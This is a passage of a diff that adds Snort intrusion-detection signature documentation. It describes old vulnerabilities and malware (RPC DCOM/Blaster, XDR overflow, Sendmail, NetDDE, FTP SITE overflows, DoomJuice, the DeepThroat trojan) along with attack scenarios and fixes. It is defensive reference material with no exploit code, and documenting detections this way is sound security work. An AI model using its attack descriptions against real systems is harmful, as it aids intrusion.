+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/2095.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2095
+
+--
+Summary:
+vulnerability in the rpc service for the Calendar Manager Service Daemon
+(CMSD) used by XDR.
+
+--
+Impact:
+System compromise, denial of service, execution of arbitrary code, 
+information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in various implementations of external data 
+representation (XDR) libraries. An integer overflow in a component 
+(xdr_array) used by XDR can lead to a buffer overflow.
+
+The XDR libraries are widely used by multiple vendors to provide a 
+framework for data transmission across networks. This is most commonly 
+used in RPC implementations.
+
+A specially crafted rpc request containing a large number of arguments 
+to xdr_array can lead to remote system compromise and super user access 
+to the target host. Additionally, a denial of service and execution of 
+arbitrary code with the privilege of the super user is also possible 
+depending on the platform used.
+
+--
+Affected Systems:
+Multiple verndors including all those using:
+	Sun Microsystems Network Services Library (libnsl)
+	GNU C library with sunrpc (glibc)
+	BSD-derived libraries with XDR/RPC routines (libc)
+
+--
+Attack Scenarios:
+The attacker needs to send a specially crafted rpc request containing a 
+large number of arguments for xdr_array to the target host.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade the vendor libraries to the latest non-affected versions. Any 
+statically linked binaries and applications must be recompiled and 
+restarted after the upgrade.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5356
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0391
+
+CERT:
+http://www.cert.org/advisories/CA-2002-25.html
+http://www.kb.cert.org/vuls/id/192995
+
+--
--- /dev/null
+++ b/doc/signatures/122-27.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-27
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a open port
+was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2661.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2661
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2754.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2754
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2160.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2160
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1561.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1561
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2267.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2267
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2193.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2193
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/3186.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3186
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2295.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2295
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/830.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+830
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3362.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3362
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1277.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1277
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ypupdated is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ypupdated is using.  Attackers can also learn what versions of the ypupdated protocol are accepted by ypupdated.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ypupdated run.  The ypupdated RPC service allows clients to update maps for Network Information Service (NIS), formerly known as Sun Yellow Pages.  A vulnerability exists with improper validation associated with the 'make' command used to update changes, allowing the execution of arbitrary commands as root.  
+
+--
+Affected Systems:
+HP HP-UX 10.1, 10.10, 10.20
+IBM AIX 3.2, 4.1
+NEC EWS-UX/V, UP-UX/V 
+SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3,4.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3, 6.0.1
+Sun SunOS 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypupdated runs.  This may be a precursor to accessing ypupdated.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypupdated, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypupdated, not probes of the ypupdated service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ypupdated service itself. An attacker may attempt to go directly to the ypupdated port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1749
+
+CERT
+http://www.cert.org/advisories/CA-1995-17.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS125
+
+--
--- /dev/null
+++ b/doc/signatures/1764.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1764
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1529.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1529
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow or denial of service vulnerability associated with FTP SITE command. 
+
+--
+Impact:
+Remote access or denial of service.  A successful attack can cause a
+denial of service or allow remote execution of arbitrary commands with
+privileges of the process running the FTP server. 
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit various
+vulnerabilities associated with the FTP SITE command of different FTP
+servers. The Windows Serv-U FTP server 2.5a can be made to crash when an
+overly long argument is supplied to the SITE PASS command. The GuildFTPd
+free Windows FTP server 0.97 is vulnerable to a buffer overflow caused
+by issuing a SITE command that is 261 bytes or longer. A buffer overflow
+exists in Debian Linux 2.2 FTP daemon that is caused by issuing a SITE
+command that is 400 bytes or longer. The buffer overflow attacks may
+permit the execution of arbitrary commands with the privileges of the
+process running the FTP server. All of these attacks require login
+access to the vulnerable server via an authenticated or anonymous user.
+
+--
+Affected Systems:
+	Serv-U FTP server 2.5a.
+	GuildFTPd Server 0.97.
+	Debian 2.2 FTP server.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable FTP server and enter an overly
+long file argument with the SITE command, causing a denial of service or
+buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2967.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2967
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/119-13.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+119-13
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of a newline "\n" character as a delimeter. This is non-standard but
+is accepted by both Apache and IIS web servers.
+
+--
+Affected Systems:
+	All web servers
+
+--
+Attack Scenarios: 
+An attacker may supply the newline character as the delimeter in a web
+request.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/3241.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3241
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2375.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+2375
+
+--
+Summary:
+This event is generated when activity from the worm DoomJuice is
+detected. 
+
+--
+Impact:
+This is indicative of worm activity which may launch of a Denial of
+Service condition against Microsoft from infected machines.
+
+--
+Detailed Information:
+This event is indicative of activity by the DoomJuice worm. This worm
+attempts to connect to random addresses on port 3127, if it receives a
+response it will attempt to upload a copy of itself to the target
+machine. If no response is received on that port, it will try on ports
+between 3127 and 3199.
+
+If the date is between February 8th and February 28th 2004, the worm
+will attempt to launch a Denial of Service (DoS) attack against
+www.microsoft.com.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows Me
+	Windows NT
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+It is possible to edit the binary data in the executable to create a
+variant of the worm. This may evade the rule.
+
+--
+Corrective Action:
+Use Anti-Virus software to remove the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000519.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000519
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VUBB" application running on a webserver. Access to the 
+file "index.php" with SQL commands being passed as the "user" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "user" parameter in the "index.php" script used by the 
+"VUBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VUBB
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
